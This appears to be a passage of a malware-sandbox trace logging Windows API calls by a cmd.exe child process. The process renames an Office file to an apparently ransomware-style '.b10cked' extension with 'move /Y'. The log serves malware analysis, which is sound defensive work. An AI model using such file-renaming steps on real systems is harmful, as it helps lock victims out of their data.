phkResult=0x1ce6d4*=0x40) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0xa0, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x1, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x1, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x0, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x40, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x40, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x40, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegCloseKey (hKey=0x40) returned 0x0 [0162.436] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6d4 | out: phkResult=0x1ce6d4*=0x40) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x40, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x1, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x1, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x0, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x9, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x4, lpData=0x1ce6e0*=0x9, lpcbData=0x1ce6d8*=0x4) returned 0x0 [0162.436] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6dc, lpData=0x1ce6e0, lpcbData=0x1ce6d8*=0x1000 | out: lpType=0x1ce6dc*=0x0, lpData=0x1ce6e0*=0x9, lpcbData=0x1ce6d8*=0x1000) returned 0x2 [0162.437] RegCloseKey (hKey=0x40) returned 0x0 [0162.437] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.437] srand (_Seed=0x5b886384) [0162.437] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"" [0162.437] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"" [0162.437] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.437] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.437] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.437] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.437] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.438] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.438] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.438] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.438] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.438] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.438] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.438] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.438] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.438] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.438] GetEnvironmentStringsW () returned 0x362360* [0162.438] FreeEnvironmentStringsW (penv=0x362360) returned 1 [0162.438] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.438] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.438] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.438] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0162.438] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.438] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.438] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.438] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.438] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.438] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.438] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf4a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf4a0, lpFilePart=0x1cf49c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf49c*="Desktop") returned 0x18 [0162.439] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.439] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf21c | out: lpFindFileData=0x1cf21c) returned 0x3609f0 [0162.439] FindClose (in: hFindFile=0x3609f0 | out: hFindFile=0x3609f0) returned 1 [0162.439] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf21c | out: lpFindFileData=0x1cf21c) returned 0x3609f0 [0162.439] FindClose (in: hFindFile=0x3609f0 | out: hFindFile=0x3609f0) returned 1 [0162.439] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf21c | out: lpFindFileData=0x1cf21c) returned 0x3609f0 [0162.439] FindClose (in: hFindFile=0x3609f0 | out: hFindFile=0x3609f0) returned 1 [0162.440] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.440] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.440] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.440] GetEnvironmentStringsW () returned 0x360210* [0162.440] FreeEnvironmentStringsW (penv=0x360210) returned 1 [0162.440] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.440] GetConsoleOutputCP () returned 0x1b5 [0162.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.441] GetUserDefaultLCID () returned 0x409 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf5e0, cchData=128 | out: lpLCData="0") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf5e0, cchData=128 | out: lpLCData="0") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf5e0, cchData=128 | out: lpLCData="1") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0162.442] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.442] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0162.442] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.442] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.443] GetConsoleTitleW (in: lpConsoleTitle=0x350930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.443] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.443] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.443] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.443] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.444] _wcsicmp (_String1="move", _String2=")") returned 68 [0162.444] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0162.444] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0162.444] _wcsicmp (_String1="IF", _String2="move") returned -4 [0162.444] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0162.444] _wcsicmp (_String1="REM", _String2="move") returned 5 [0162.444] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0162.448] GetConsoleTitleW (in: lpConsoleTitle=0x1cf2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.562] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0162.562] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0162.562] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0162.562] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0162.562] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="CD") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0162.562] _wcsicmp (_String1="move", _String2="REN") returned -5 [0162.562] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0162.562] _wcsicmp (_String1="move", _String2="SET") returned -6 [0162.562] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0162.562] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0162.562] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0162.562] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0162.562] _wcsicmp (_String1="move", _String2="MD") returned 11 [0162.562] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0162.562] _wcsicmp (_String1="move", _String2="RD") returned -5 [0162.562] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0162.562] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0162.562] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0162.562] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0162.562] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0162.562] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0162.562] _wcsicmp (_String1="move", _String2="VER") returned -9 [0162.562] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0162.562] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0162.562] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0162.562] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0162.562] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0162.562] _wcsicmp (_String1="move", _String2="START") returned -6 [0162.562] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0162.563] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0162.563] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0162.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.564] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf094, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf08c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf08c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0162.565] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0162.566] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0162.566] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0162.566] _wcsicmp (_String1="ENVELO~1.TRX", _String2=".") returned 55 [0162.566] _wcsicmp (_String1="ENVELO~1.TRX", _String2="..") returned 55 [0162.566] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelo~1.trx")) returned 0x2020 [0162.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x361f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.567] SetErrorMode (uMode=0x0) returned 0x0 [0162.567] SetErrorMode (uMode=0x1) returned 0x0 [0162.567] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", nBufferLength=0x104, lpBuffer=0x1cea1c, lpFilePart=0x1cea04 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", lpFilePart=0x1cea04*="ENVELO~1.TRX") returned 0x3c [0162.567] SetErrorMode (uMode=0x0) returned 0x1 [0162.567] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2010 [0162.567] _wcsicmp (_String1="ENVELO~1.TRX", _String2=".") returned 55 [0162.567] _wcsicmp (_String1="ENVELO~1.TRX", _String2="..") returned 55 [0162.567] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelo~1.trx")) returned 0x2020 [0162.567] SetErrorMode (uMode=0x0) returned 0x0 [0162.567] SetErrorMode (uMode=0x1) returned 0x0 [0162.567] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", nBufferLength=0x104, lpBuffer=0x1cee98, lpFilePart=0x1cec30 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", lpFilePart=0x1cec30*="ENVELO~1.TRX") returned 0x3c [0162.567] SetErrorMode (uMode=0x0) returned 0x1 [0162.567] SetErrorMode (uMode=0x0) returned 0x0 [0162.568] SetErrorMode (uMode=0x1) returned 0x0 [0162.568] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1cf0a0, lpFilePart=0x1cec30 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked", lpFilePart=0x1cec30*="ENVELOPR.DLL.trx_dll.b10cked") returned 0x4c [0162.568] SetErrorMode (uMode=0x0) returned 0x1 [0162.568] SetLastError (dwErrCode=0x0) [0162.568] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelopr.dll.trx_dll.b10cked")) returned 0xffffffff [0162.568] GetLastError () returned 0x2 [0162.568] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1ce5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce5ac) returned 0x362130 [0162.568] FindNextFileW (in: hFindFile=0x362130, lpFindFileData=0x1ce5ac | out: lpFindFileData=0x1ce5ac) returned 0 [0162.569] GetLastError () returned 0x12 [0162.569] FindClose (in: hFindFile=0x362130 | out: hFindFile=0x362130) returned 1 [0162.570] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x361cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361cc0) returned 0x362130 [0162.570] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x1ce844, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0162.570] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x1ce844, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0162.570] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelopr.dll.trx_dll")) returned 0x2020 [0162.571] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelopr.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\envelopr.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0162.571] FindClose (in: hFindFile=0x362130 | out: hFindFile=0x362130) returned 1 [0162.571] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ce7f8 | out: _Buffer=" 1") returned 9 [0162.571] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.571] GetFileType (hFile=0x7) returned 0x2 [0162.572] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.572] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ce784 | out: lpMode=0x1ce784) returned 1 [0162.572] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.572] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ce7b8 | out: lpConsoleScreenBufferInfo=0x1ce7b8) returned 1 [0162.572] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0162.573] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ce7f8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0162.573] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ce7dc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ce7dc*=0x1a) returned 1 [0162.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.573] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.573] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.573] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.573] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.573] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.573] SetConsoleInputExeNameW () returned 0x1 [0162.574] GetConsoleOutputCP () returned 0x1b5 [0162.574] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.574] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.574] exit (_Code=0) Process: id = "279" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xfe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" 